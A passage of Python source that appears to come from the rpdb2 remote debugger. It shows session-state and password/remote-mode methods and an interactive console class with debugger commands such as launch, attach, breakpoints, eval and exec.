self.m_event_dispatcher.fire_event(event)
event = CEventNamespace()
self.m_event_dispatcher.fire_event(event)
return si
def get_frame_index(self, fLock = True):
try:
if fLock:
self.m_state_manager.acquire()
self.__verify_attached()
if self.m_state_manager.get_state() == STATE_ANALYZE:
return self.m_frame_index_exception
else:
return self.m_frame_index
finally:
if fLock:
self.m_state_manager.release()
def set_analyze(self, fAnalyze):
try:
self.m_state_manager.acquire()
if fAnalyze and (self.m_state_manager.get_state() != STATE_BROKEN):
raise DebuggerNotBroken
if (not fAnalyze) and (self.m_state_manager.get_state() != STATE_ANALYZE):
return
state = [STATE_BROKEN, STATE_ANALYZE][fAnalyze]
self.m_state_manager.set_state(state, fLock = False)
finally:
self.m_state_manager.release()
self.refresh()
def getSession(self):
self.__verify_attached()
return self.m_session
def get_state(self):
return as_unicode(self.m_state_manager.get_state())
def set_password(self, _rpdb2_pwd):
assert(is_unicode(_rpdb2_pwd))
if not is_valid_pwd(_rpdb2_pwd):
raise BadArgument
try:
self.m_state_manager.acquire()
self.__verify_unattached()
self.m_rpdb2_pwd = _rpdb2_pwd
finally:
self.m_state_manager.release()
def set_random_password(self):
try:
self.m_state_manager.acquire()
self.__verify_unattached()
self.m_rpdb2_pwd = generate_random_password()
self.m_printer(STR_RANDOM_PASSWORD)
finally:
self.m_state_manager.release()
def get_password(self):
return self.m_rpdb2_pwd
def set_remote(self, fAllowRemote):
try:
self.m_state_manager.acquire()
self.__verify_unattached()
self.m_fAllowRemote = fAllowRemote
finally:
self.m_state_manager.release()
def get_remote(self):
return self.m_fAllowRemote
def set_environ(self, envmap):
self.m_environment = []
try:
for k, v in envmap:
k = as_unicode(k, fstrict = True)
v = as_unicode(v, fstrict = True)
self.m_environment.append((k, v))
except:
raise BadArgument
def get_environ(self):
return self.m_environment
def stop_debuggee(self):
self.__verify_attached()
try:
self.save_breakpoints()
except:
print_debug_exception()
pass
self.m_printer(STR_ATTEMPTING_TO_STOP)
self.m_printer(STR_ATTEMPTING_TO_DETACH)
self.m_state_manager.set_state(STATE_DETACHING)
self.__stop_event_monitor()
try:
self.getSession().getProxy().stop_debuggee()
finally:
self.m_state_manager.set_state(STATE_DETACHED)
self.m_session = None
self.m_printer(STR_DETACH_SUCCEEDED)
class CConsoleInternal(cmd.Cmd, threading.Thread):
def __init__(self, session_manager, stdin = None, stdout = None, fSplit = False):
global g_fDefaultStd
cmd.Cmd.__init__(self, stdin = stdin, stdout = stdout)
threading.Thread.__init__(self)
self.fAnalyzeMode = False
self.fPrintBroken = True
self.m_filename = as_unicode('')
self.m_completion_thread = None
self.use_rawinput = [1, 0][fSplit]
self.m_fSplit = fSplit
self.prompt = [[CONSOLE_PROMPT, CONSOLE_PROMPT_ANALYZE][self.fAnalyzeMode], ""][fSplit]
self.intro = CONSOLE_INTRO
if fSplit:
self.intro += '\n'
#thread_set_daemon(self, True)
self.m_session_manager = session_manager
self.m_session_manager.set_printer(self.printer)
event_type_dict = {CEventState: {}}
self.m_session_manager.register_callback(self.event_handler, event_type_dict, fSingleUse = False)
event_type_dict = {CEventSynchronicity: {}}
self.m_session_manager.register_callback(self.synchronicity_handler, event_type_dict, fSingleUse = False)
event_type_dict = {CEventTrap: {}}
self.m_session_manager.register_callback(self.trap_handler, event_type_dict, fSingleUse = False)
event_type_dict = {CEventForkMode: {}}
self.m_session_manager.register_callback(self.fork_mode_handler, event_type_dict, fSingleUse = False)
self.m_last_source_line = None
self.m_last_nlines = DEFAULT_NUMBER_OF_LINES
self.m_fAddPromptBeforeMsg = False
self.m_eInLoop = threading.Event()
self.cmdqueue.insert(0, '')
self.m_stdout = self.stdout
self.m_encoding = detect_encoding(self.stdin)
g_fDefaultStd = (stdin == None)
if self.use_rawinput:
try:
import readline
cd = readline.get_completer_delims()
if not '.' in cd:
readline.set_completer_delims(cd + '.')
except:
pass
def set_filename(self, filename):
assert(is_unicode(filename))
self.m_filename = filename
def precmd(self, line):
line = as_unicode(line, self.m_encoding)
self.m_fAddPromptBeforeMsg = True
if not event_is_set(self.m_eInLoop):
self.m_eInLoop.set()
time.sleep(0.01)
if not line.strip():
return line
command = line.split(' ', 1)[0].split(SOURCE_MORE, 1)[0].split(SOURCE_LESS, 1)[0]
if command not in ['list', 'l']:
self.m_last_source_line = None
self.m_last_nlines = DEFAULT_NUMBER_OF_LINES
return line
def postcmd(self, stop, line):
self.m_fAddPromptBeforeMsg = False
return stop
def onecmd(self, line):
"""
Default Error handling and reporting of session manager errors.
"""
try:
return cmd.Cmd.onecmd(self, line)
except (socket.error, CConnectionException):
self.m_session_manager.report_exception(*sys.exc_info())
except CException:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.m_session_manager.report_exception(*sys.exc_info())
print_debug_exception(True)
return False
def default(self, line):
"""
Called on an input line when the command prefix is not recognized.
Over-rides base method at cmd.py.
"""
self.printer(STR_BAD_SYNTAX % line)
def emptyline(self):
pass
def complete(self, text, state):
"""
Return the next possible completion for 'text'.
If a command has not been entered, then complete against command list.
Otherwise try to call complete_<command> to get list of completions.
"""
if self.use_rawinput:
#
# Import cmd to workaround a strange bug in Python.
#
import cmd
return cmd.Cmd.complete(self, text, state)
#
# Without rawinput assuming text includes entire buffer up to cursor.
#
try:
if state != 0:
return self.completion_matches[state]
if not ' ' in text:
self.completion_matches = self.completenames(text)
return self.completion_matches[state]
cmd, args, foo = self.parseline(text)
if cmd == '' or not hasattr(self, 'complete_' + cmd):
self.completion_matches = self.completedefault(text)
return self.completion_matches[state]
compfunc = getattr(self, 'complete_' + cmd)
self.completion_matches = compfunc(text)
return self.completion_matches[state]
except IndexError:
return None
def complete_launch(self, text, line = None, begidx = None, endidx = None):
if line != None and endidx != None:
text = line[:endidx]
if text.endswith(' '):
dn, bn = '', ''
else:
path = text.split()[-1]
dn, bn = os.path.split(path)
prefix = text
if bn != '':
prefix = prefix[:-len(bn)]
if dn == '' and bn.startswith('~'):
if bn == os.path.expanduser(bn):
c = text
else:
c = os.path.join(text, '')
if begidx != None:
c = c[begidx:]
return [c]
pl = [dn]
if dn == '':
pl += os.environ['PATH'].split(os.pathsep)
fl = []
for p in pl:
if p == '':
p = '.'
try:
ep = os.path.expanduser(p)
l = os.listdir(ep)
for f in l:
if not f.startswith(bn):
continue
root, ext = os.path.splitext(f)
if not ext in ['.py', '.pyw', '']:
continue
if os.path.isdir(os.path.join(ep, f)):
c = prefix + os.path.join(f, '')
else:
c = prefix + f
if begidx != None:
c = c[begidx:]
fl.append(c)
except:
pass
fs = set(fl)
cl = list(fs)
cl.sort()
return cl
def complete_eval(self, text, line = None, begidx = None, endidx = None):
t = self.m_completion_thread
if t != None and thread_is_alive(t):
return []
self.m_completion_thread = None
result = [('', [])]
if line != None and endidx != None:
text = line[:endidx]
t = threading.Thread(target = self.complete_expression_job, args = (text, result))
t.start()
t.join(PING_TIMEOUT)
if thread_is_alive(t):
self.m_completion_thread = t
return []
(prefix, completions) = result[-1]
if begidx != None:
prefix = prefix[begidx:]
ce = [prefix + c for c in completions]
return ce
complete_v = complete_eval
complete_exec = complete_eval
complete_x = complete_exec
def complete_expression_job(self, text, result):
try:
(prefix, completions) = self.m_session_manager.complete_expression(text)
result.append((prefix, completions))
except:
print_debug_exception()
def run(self):
self.cmdloop()
def __get_str_wrap(self, _str, max_len):
if len(_str) <= max_len and not '\n' in _str:
return (_str, '')
s = _str[: max_len]
i = s.find('\n')
if i == -1:
i = s.rfind(' ')
if i == -1:
return (s, _str[max_len:])
return (_str[: i], _str[i + 1:])
def printer(self, _str):
if not event_is_set(self.m_eInLoop):
self.m_eInLoop.wait()
fAPBM = self.m_fAddPromptBeforeMsg
prefix = ['', self.prompt.strip('\n')][fAPBM] + CONSOLE_PRINTER
suffix = '\n' + [self.prompt.strip('\n'), ''][fAPBM]
s = _str
while s != '':
s, _s = self.__get_str_wrap(s, CONSOLE_WRAP_INDEX - len(prefix + suffix))
_print(prefix + s + suffix, self.m_stdout, feol = False)
s = _s
self.m_stdout.flush()
def print_notice(self, notice):
nl = notice.split('\n')
i = 0
for l in nl:
_print(l, self.m_stdout)
i += 1
if i % PRINT_NOTICE_LINES_PER_SECTION == 0:
_print("\n" + PRINT_NOTICE_PROMPT, self.m_stdout, feol = False)
response = self.stdin.readline()
if response != '\n':
break
_print('', self.m_stdout)
def event_handler(self, event):
state = event.m_state
if (state == STATE_BROKEN) and self.fPrintBroken:
self.fPrintBroken = False
self.printer(STR_DEBUGGER_HAS_BROKEN)
return
if (state != STATE_ANALYZE) and self.fAnalyzeMode:
self.fAnalyzeMode = False
self.prompt = [CONSOLE_PROMPT, ""][self.m_fSplit]
self.printer(STR_ANALYZE_MODE_TOGGLE % MODE_OFF)
return
if (state == STATE_ANALYZE) and not self.fAnalyzeMode:
self.fAnalyzeMode = True
self.prompt = [CONSOLE_PROMPT_ANALYZE, ""][self.m_fSplit]
self.printer(STR_ANALYZE_MODE_TOGGLE % MODE_ON)
return
def synchronicity_handler(self, event):
self.printer(STR_SYNCHRONICITY_MODE % str(event.m_fsynchronicity))
def trap_handler(self, event):
self.printer(STR_TRAP_MODE_SET % str(event.m_ftrap))
def fork_mode_handler(self, event):
x = [FORK_PARENT, FORK_CHILD][event.m_ffork_into_child]
y = [FORK_MANUAL, FORK_AUTO][event.m_ffork_auto]
self.printer(STR_FORK_MODE_SET % (x, y))
def do_launch(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
if arg[:2] == '-k':
fchdir = False
_arg = arg[2:].strip()
else:
fchdir = True
_arg = arg
self.fPrintBroken = True
try:
self.m_session_manager.launch(fchdir, _arg)
return
except BadArgument:
self.printer(STR_BAD_ARGUMENT)
except IOError:
self.printer(STR_FILE_NOT_FOUND % arg)
except:
self.fPrintBroken = False
raise
self.fPrintBroken = False
def do_restart(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
try:
self.m_session_manager.restart()
return
except BadArgument:
self.printer(STR_BAD_ARGUMENT)
except IOError:
self.printer(STR_FILE_NOT_FOUND % arg)
except:
self.fPrintBroken = False
raise
self.fPrintBroken = False
def do_attach(self, arg):
if arg == '':
return self.__scripts(arg)
self.fPrintBroken = True
try:
self.m_session_manager.attach(arg)
return
except BadArgument:
self.printer(STR_BAD_ARGUMENT)
except:
self.fPrintBroken = False
raise
self.fPrintBroken = False
def __scripts(self, arg):
if self.m_session_manager.get_password() is None:
_print(STR_PASSWORD_MUST_BE_SET, self.m_stdout)
return
host = self.m_session_manager.get_host()
_print(STR_SCRIPTS_CONNECTING % host, self.m_stdout)
(server_list, errors) = self.m_session_manager.calc_server_list()
if server_list == []:
_print(STR_SCRIPTS_NO_SCRIPTS % host, self.m_stdout)
return
try:
spid = self.m_session_manager.get_server_info().m_pid
except NotAttached:
spid = None
_print(STR_SCRIPTS_TO_DEBUG % host, self.m_stdout)
for s in server_list:
m = ['', SYMBOL_MARKER][spid == s.m_pid]
_print(' %1s %-5d %s' % (m, s.m_pid, s.m_filename), self.m_stdout)
def do_detach(self, arg):
if not arg == '':
self.printer(STR_BAD_ARGUMENT)
return
self.m_session_manager.detach()
def do_host(self, arg):
if arg == '':
host = self.m_session_manager.get_host()
_print(host, self.m_stdout)
return
try:
self.m_session_manager.set_host(arg)
except socket.gaierror:
e = sys.exc_info()[1]
self.printer(MSG_ERROR_HOST_TEXT % (arg, e))
def do_break(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
self.m_session_manager.request_break()
do_b = do_break
def __parse_bp_arg(self, arg, fAllowExpr = True):
_args = arg.split(BP_EVAL_SEP)
if (len(_args) > 1) and (not fAllowExpr):
raise BadArgument
if len(_args) > 1:
expr = _args[1].strip()
else:
expr = ''
rf = _args[0].rfind(BP_FILENAME_SEP)
if rf == -1:
args = [_args[0]]
else:
args = [_args[0][:rf], _args[0][rf + 1:]]
filename = ['', args[0]][len(args) > 1]
if filename in [None, '']:
filename = self.m_filename
try:
lineno = int(args[-1])
scope = ''
except ValueError:
lineno = 0
scope = args[-1].strip()
return (filename, scope, lineno, expr)
def do_go(self, arg):
if self.fAnalyzeMode:
self.printer(STR_ILEGAL_ANALYZE_MODE_CMD)
return
try:
if arg != '':
(filename, scope, lineno, expr) = self.__parse_bp_arg(arg, fAllowExpr = False)
self.fPrintBroken = True
self.m_session_manager.request_go_breakpoint(filename, scope, lineno)
return
self.fPrintBroken = True
self.m_session_manager.request_go()
return
except BadArgument:
self.printer(STR_BAD_ARGUMENT)
except IOError:
self.printer(STR_FILE_NOT_FOUND % filename)
except InvalidScopeName:
self.printer(STR_SCOPE_NOT_FOUND % scope)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.fPrintBroken = False
raise
self.fPrintBroken = False
do_g = do_go
def do_step(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
if self.fAnalyzeMode:
self.printer(STR_ILEGAL_ANALYZE_MODE_CMD)
return
try:
self.m_session_manager.request_step()
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_s = do_step
def do_next(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
if self.fAnalyzeMode:
self.printer(STR_ILEGAL_ANALYZE_MODE_CMD)
return
try:
self.m_session_manager.request_next()
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_n = do_next
def do_return(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
if self.fAnalyzeMode:
self.printer(STR_ILEGAL_ANALYZE_MODE_CMD)
return
try:
self.m_session_manager.request_return()
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_r = do_return
def do_jump(self, arg):
try:
lineno = int(arg)
except ValueError:
self.printer(STR_BAD_ARGUMENT)
return
try:
self.m_session_manager.request_jump(lineno)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_j = do_jump
def do_bp(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
try:
(filename, scope, lineno, expr) = self.__parse_bp_arg(arg, fAllowExpr = True)
self.m_session_manager.set_breakpoint(filename, scope, lineno, True, expr)
except BadArgument:
self.printer(STR_BAD_ARGUMENT)
except IOError:
self.printer(STR_FILE_NOT_FOUND % filename)
except InvalidScopeName:
self.printer(STR_SCOPE_NOT_FOUND % scope)
except SyntaxError:
self.printer(STR_BAD_EXPRESSION % expr)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
def do_be(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
try:
id_list = []
fAll = (arg == SYMBOL_ALL)
if not fAll:
sid_list = arg.split()
id_list = [int(sid) for sid in sid_list]
self.m_session_manager.enable_breakpoint(id_list, fAll)
except ValueError:
self.printer(STR_BAD_ARGUMENT)
def do_bd(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
try:
id_list = []
fAll = (arg == SYMBOL_ALL)
if not fAll:
sid_list = arg.split()
id_list = [int(sid) for sid in sid_list]
self.m_session_manager.disable_breakpoint(id_list, fAll)
except ValueError:
self.printer(STR_BAD_ARGUMENT)
def do_bc(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
try:
id_list = []
fAll = (arg == SYMBOL_ALL)
if not fAll:
sid_list = arg.split()
id_list = [int(sid) for sid in sid_list]
self.m_session_manager.delete_breakpoint(id_list, fAll)
except ValueError:
self.printer(STR_BAD_ARGUMENT)
def do_bl(self, arg):
bpl = self.m_session_manager.get_breakpoints()
bplk = list(bpl.keys())
bplk.sort()
_print(STR_BREAKPOINTS_LIST, self.m_stdout)
for id in bplk:
bp = bpl[id]
if bp.m_expr:
expr = bp.m_expr
else:
expr = ''
try:
expr.encode('ascii', 'strict')
encoding = ''
except:
encoding = bp.m_encoding
scope = bp.m_scope_fqn
if scope.startswith(MODULE_SCOPE + '.'):
scope = scope[len(MODULE_SCOPE) + 1:]
elif scope.startswith(MODULE_SCOPE2 + '.'):
scope = scope[len(MODULE_SCOPE2) + 1:]
state = [STATE_DISABLED, STATE_ENABLED][bp.isEnabled()]
s = STR_BREAKPOINTS_TEMPLATE % (id, state, bp.m_lineno, clip_filename(bp.m_filename, 45), calc_suffix(scope, 45), calc_prefix(expr, 50), encoding)
_print(s.rstrip() + '\n', self.m_stdout)
def do_save(self, arg):
self.m_session_manager.save_breakpoints(arg)
_print(STR_BREAKPOINTS_SAVED, self.m_stdout)
return
def do_load(self, arg):
try:
self.m_session_manager.load_breakpoints(arg)
_print(STR_BREAKPOINTS_LOADED, self.m_stdout)
return
except IOError:
error = [STR_BREAKPOINTS_FILE_NOT_FOUND, STR_BREAKPOINTS_NOT_FOUND][arg == '']
self.printer(error)
def do_stack(self, arg):
if self.fAnalyzeMode and (arg != ''):
self.printer(STR_ILEGAL_ANALYZE_MODE_ARG)
return
try:
tid_list = []
fAll = (arg == SYMBOL_ALL)
if not fAll:
sid_list = arg.split()
tid_list = [int(sid) for sid in sid_list]
sl = self.m_session_manager.get_stack(tid_list, fAll)
if len(sl) == 0:
self.printer(STR_NO_THREADS_FOUND)
return
frame_index = self.m_session_manager.get_frame_index()
m = None
for st in sl:
s = st.get(DICT_KEY_STACK, [])
tid = st.get(DICT_KEY_TID, 0)
fBroken = st.get(DICT_KEY_BROKEN, False)
fCurrent = st.get(DICT_KEY_CURRENT_TID, False)
if m is not None:
_print('', self.m_stdout)
_print(STR_STACK_TRACE % tid, self.m_stdout)
i = 0
while i < len(s):
e = s[-(1 + i)]
marker = [SOURCE_STATE_UNBROKEN, SYMBOL_MARKER][fBroken]
if fCurrent:
m = ['', marker][i == frame_index]
else:
m = ['', marker][i == 0]
_print(' %1s %5d %-28s %4d %s' % (m, i, calc_suffix(e[0], 28), e[1], calc_prefix(e[2], 20)), self.m_stdout)
i += 1
except ValueError:
self.printer(STR_BAD_ARGUMENT)
except (NoExceptionFound, NoThreads):
self.m_session_manager.report_exception(*sys.exc_info())
do_k = do_stack
def do_list(self, arg):
rf = arg.rfind(BP_FILENAME_SEP)
if rf == -1:
_filename = ''
__args2 = arg
else:
_filename = arg[:rf]
__args2 = arg[rf + 1:]
_args = __args2.split(BP_EVAL_SEP)
fAll = (_args[0] == SYMBOL_ALL)
fMore = (_args[0] == SOURCE_MORE)
fLess = (_args[0] == SOURCE_LESS)
fEntire = (_args[0] == SOURCE_ENTIRE_FILE)
fCurrent = (_args[0] == '')
fLine = False
l = 1
try:
if len(_args) > 1:
nlines = int(_args[1])
else:
nlines = self.m_last_nlines
if not (fAll or fMore or fLess or fEntire or fCurrent):
l = int(_args[0])
fLine = True
except ValueError:
self.printer(STR_BAD_ARGUMENT)
return
if self.fAnalyzeMode and fAll:
self.printer(STR_ILEGAL_ANALYZE_MODE_ARG)
return
if fMore and self.m_last_source_line:
l = max(1, self.m_last_source_line + self.m_last_nlines // 2 + 1)
fLine = True
elif fLess and self.m_last_source_line:
l = max(1, self.m_last_source_line - (self.m_last_nlines - 1) // 2 - nlines)
fLine = True
try:
if fEntire:
r = [self.m_session_manager.get_source_file(_filename, -1, -1)]
elif fLine:
r = [self.m_session_manager.get_source_file(_filename, l, nlines)]
elif _filename != '':
r = [self.m_session_manager.get_source_file(_filename, l, nlines)]
else:
r = self.m_session_manager.get_source_lines(nlines, fAll)
if len(r) == 0:
self.printer(STR_NO_THREADS_FOUND)
return
m = None
for d in r:
tid = d.get(DICT_KEY_TID, 0)
filename = d.get(DICT_KEY_FILENAME, '')
breakpoints = d.get(DICT_KEY_BREAKPOINTS, {})
source_lines = d.get(DICT_KEY_LINES, [])
first_lineno = d.get(DICT_KEY_FIRST_LINENO, 0)
if len(r) == 1 and first_lineno != 0:
l = first_lineno
fBroken = d.get(DICT_KEY_BROKEN, False)
frame_event = d.get(DICT_KEY_EVENT, '')
frame_lineno = d.get(DICT_KEY_FRAME_LINENO, 0)
if m is not None:
_print('', self.m_stdout)
_print(STR_SOURCE_LINES % (tid, filename), self.m_stdout)
for i, line in enumerate(source_lines):
lineno = first_lineno + i
if lineno != frame_lineno:
m = ''
elif not fBroken:
m = SOURCE_STATE_UNBROKEN + SYMBOL_MARKER
elif frame_event == 'call':
m = SOURCE_EVENT_CALL + SYMBOL_MARKER
elif frame_event == 'line':
m = SOURCE_EVENT_LINE + SYMBOL_MARKER
elif frame_event == 'return':
m = SOURCE_EVENT_RETURN + SYMBOL_MARKER
elif frame_event == 'exception':
m = SOURCE_EVENT_EXCEPTION + SYMBOL_MARKER
if breakpoints.get(lineno, None) == STATE_ENABLED:
b = SOURCE_BP_ENABLED
elif breakpoints.get(lineno, None) == STATE_DISABLED:
b = SOURCE_BP_DISABLED
else:
b = ''
line = line.replace('\t', ' ' * PYTHON_TAB_WIDTH)
_print(' %2s %1s %5d %s' % (m, b, lineno, calc_prefix(line[:-1], 60)), self.m_stdout)
if fAll or fEntire:
self.m_last_source_line = None
elif len(source_lines) != 0:
self.m_last_source_line = [l + (nlines - 1) // 2, frame_lineno][l == -1]
self.m_last_nlines = nlines
except (InvalidFrame, IOError):
self.printer(STR_SOURCE_NOT_FOUND)
except (NoExceptionFound, NoThreads):
self.m_session_manager.report_exception(*sys.exc_info())
do_l = do_list
def do_up(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
try:
fi = self.m_session_manager.get_frame_index()
self.m_session_manager.set_frame_index(fi - 1)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
def do_down(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
try:
fi = self.m_session_manager.get_frame_index()
self.m_session_manager.set_frame_index(fi + 1)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
def evaluate_job(self, sync_event, expr):
try:
(value, warning, error) = self.m_session_manager.evaluate(expr)
if warning:
self.printer(STR_WARNING % warning)
if error:
_print(error + '\n', self.m_stdout)
_print(value, self.m_stdout)
if event_is_set(sync_event):
_print(self.prompt, self.m_stdout, feol = False)
return
except (NoExceptionFound, DebuggerNotBroken):
self.m_session_manager.report_exception(*sys.exc_info())
except (socket.error, CConnectionException):
self.m_session_manager.report_exception(*sys.exc_info())
except CException:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.m_session_manager.report_exception(*sys.exc_info())
print_debug_exception(True)
def do_eval(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
sync_event = threading.Event()
t = threading.Thread(target = self.evaluate_job, args = (sync_event, arg))
t.start()
t.join(WAIT_FOR_BREAK_TIMEOUT)
if thread_is_alive(t):
_print(STR_OUTPUT_WARNING_ASYNC, self.m_stdout)
sync_event.set()
do_v = do_eval
def execute_job(self, sync_event, suite):
try:
(warning, error) = self.m_session_manager.execute(suite)
if warning:
self.printer(STR_WARNING % warning)
if error:
_print(error + '\n', self.m_stdout)
if event_is_set(sync_event):
_print(self.prompt, self.m_stdout, feol = False)
return
except (NoExceptionFound, DebuggerNotBroken):
self.m_session_manager.report_exception(*sys.exc_info())
except (socket.error, CConnectionException):
self.m_session_manager.report_exception(*sys.exc_info())
except CException:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.m_session_manager.report_exception(*sys.exc_info())
print_debug_exception(True)
def do_exec(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
_print(STR_OUTPUT_WARNING, self.m_stdout)
sync_event = threading.Event()
t = threading.Thread(target = self.execute_job, args = (sync_event, arg))
t.start()
t.join(WAIT_FOR_BREAK_TIMEOUT)
if thread_is_alive(t):
_print(STR_OUTPUT_WARNING_ASYNC, self.m_stdout)
sync_event.set()
do_x = do_exec
def do_encoding(self, arg):
if arg == '':
encoding, fraw = self.m_session_manager.get_encoding()
if encoding != ENCODING_AUTO:
try:
codecs.lookup(encoding)
except:
encoding += ' (?)'
if fraw:
encoding += ', ' + ENCODING_RAW
_print(STR_ENCODING_MODE % encoding, self.m_stdout)
return
if ',' in arg:
encoding, raw = arg.split(',')
else:
encoding, raw = arg, ''
encoding = encoding.strip()
if encoding == '':
encoding, fraw = self.m_session_manager.get_encoding()
fraw = 'raw' in raw
self.m_session_manager.set_encoding(encoding, fraw)
if encoding != ENCODING_AUTO:
try:
codecs.lookup(encoding)
except:
encoding += ' (?)'
_print(STR_ENCODING_BAD, self.m_stdout)
if fraw:
encoding += ', ' + ENCODING_RAW
_print(STR_ENCODING_MODE_SET % encoding, self.m_stdout)
def do_thread(self, arg):
if self.fAnalyzeMode and (arg != ''):
self.printer(STR_ILEGAL_ANALYZE_MODE_ARG)
return
try:
if arg != '':
tid = int(arg)
self.m_session_manager.set_thread(tid)
_print(STR_THREAD_FOCUS_SET, self.m_stdout)
return
(current_thread_id, tl) = self.m_session_manager.get_thread_list()
_print(STR_ACTIVE_THREADS, self.m_stdout)
for i, t in enumerate(tl):
m = ['', SYMBOL_MARKER][t[DICT_KEY_TID] == current_thread_id]
state = [STATE_RUNNING, STR_STATE_BROKEN][t[DICT_KEY_BROKEN]]
_print(' %1s %3d %5d %-15s %s' % (m, i, t[DICT_KEY_TID], t[DICT_KEY_NAME], state[:25]), self.m_stdout)
except ValueError:
self.printer(STR_BAD_ARGUMENT)
except ThreadNotFound:
self.printer(STR_THREAD_NOT_FOUND)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_t = do_thread
def do_analyze(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
try:
self.m_session_manager.set_analyze(not self.fAnalyzeMode)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_a = do_analyze
def do_synchro(self, arg):
if arg == '':
fsynchronicity = self.m_session_manager.get_synchronicity()
_print(STR_SYNCHRONICITY_MODE % str(fsynchronicity), self.m_stdout)
return
if arg == str(True):
fsynchronicity = True
elif arg == str(False):
fsynchronicity = False
else:
_print(STR_BAD_ARGUMENT, self.m_stdout)
return
self.m_session_manager.set_synchronicity(fsynchronicity)
def do_trap(self, arg):
if arg == '':
ftrap = self.m_session_manager.get_trap_unhandled_exceptions()
_print(STR_TRAP_MODE % str(ftrap), self.m_stdout)
return
if arg == str(True):
ftrap = True
elif arg == str(False):
ftrap = False
else:
_print(STR_BAD_ARGUMENT, self.m_stdout)
return
self.m_session_manager.set_trap_unhandled_exceptions(ftrap)
def do_fork(self, arg):
(ffork_into_child, ffork_auto) = self.m_session_manager.get_fork_mode()
if arg == '':
x = [FORK_PARENT, FORK_CHILD][ffork_into_child]
y = [FORK_MANUAL, FORK_AUTO][ffork_auto]
_print(STR_FORK_MODE % (x, y), self.m_stdout)
return
arg = arg.lower()
if FORK_PARENT in arg:
ffork_into_child = False
elif FORK_CHILD in arg:
ffork_into_child = True
if FORK_AUTO in arg:
ffork_auto = True
elif FORK_MANUAL in arg:
ffork_auto = False
self.m_session_manager.set_fork_mode(ffork_into_child, ffork_auto)
def do_password(self, arg):
if arg == '':
_rpdb2_pwd = self.m_session_manager.get_password()
if _rpdb2_pwd is None:
_print(STR_PASSWORD_NOT_SET, self.m_stdout)
else:
_print(STR_PASSWORD_SET % _rpdb2_pwd, self.m_stdout)
return
_rpdb2_pwd = arg.strip('"\'')
try:
self.m_session_manager.set_password(_rpdb2_pwd)
_print(STR_PASSWORD_SET % _rpdb2_pwd, self.m_stdout)
except BadArgument:
_print(STR_PASSWORD_BAD, self.m_stdout)
def do_remote(self, arg):
if arg == '':
fAllowRemote = self.m_session_manager.get_remote()
_print(STR_REMOTE_MODE % str(fAllowRemote), self.m_stdout)
return
if arg == str(True):
fAllowRemote = True
elif arg == str(False):
fAllowRemote = False
else:
_print(STR_BAD_ARGUMENT, self.m_stdout)
return
self.m_session_manager.set_remote(fAllowRemote)
_print(STR_REMOTE_MODE % str(fAllowRemote), self.m_stdout)
def do_env(self, arg):
env = self.m_session_manager.get_environ()
if arg == '':
if len(env) == 0:
_print(STR_ENVIRONMENT_EMPTY, self.m_stdout)
return
_print(STR_ENVIRONMENT, self.m_stdout)
for k, v in env:
_print('%s=%s' % (k, v), self.m_stdout)
return
if arg[:2] == '-d':
k = arg[2:].strip()
_env = [(_k, _v) for (_k, _v) in env if _k != k]
self.m_session_manager.set_environ(_env)
return
try:
k, v = arg.split('=')
k = k.strip()
v = v.strip()
except ValueError:
self.printer(STR_BAD_ARGUMENT)
return
_env = [(_k, _v) for (_k, _v) in env if _k != k]
_env.append((k, v))
self.m_session_manager.set_environ(_env)
def do_stop(self, arg):
self.m_session_manager.stop_debuggee()
def do_exit(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
if self.m_session_manager.get_state() != STATE_DETACHED:
try:
self.do_stop('')
except (socket.error, CConnectionException):
self.m_session_manager.report_exception(*sys.exc_info())
except CException:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.m_session_manager.report_exception(*sys.exc_info())
print_debug_exception(True)
_print('', self.m_stdout)
return True
do_EOF = do_exit
def do_copyright(self, arg):
self.print_notice(COPYRIGHT_NOTICE)
def do_license(self, arg):
self.print_notice(LICENSE_NOTICE + COPY_OF_THE_GPL_LICENSE)
def do_credits(self, arg):
self.print_notice(CREDITS_NOTICE)
def do_help(self, arg):
cmd.Cmd.do_help(self, arg)
if arg == '':
help_notice = """Security:
----------------
password - Get or set the channel password.
remote - Get or set "allow connections from remote machines" mode.
Session Control:
-----------------
env - Display or set the environment setting for new sessions.
host - Display or change host.
attach - Display scripts or attach to a script on host.
detach - Detach from script.
launch - Start a script and attach to it.
restart - Restart a script.
stop - Shutdown the debugged script.
exit - Exit from debugger.
Debuggee Control:
-----------------
break - Request an immediate break.
step - Continue to the next execution line.
next - Continue to the next execution line in the current frame.
return - Continue until the debugger is about to return from the frame.
jump - Jump to a line in the current scope.
go - Continue execution.
Breakpoints Control:
--------------------
bp - Set a break point.
bd - Disable a breakpoint.
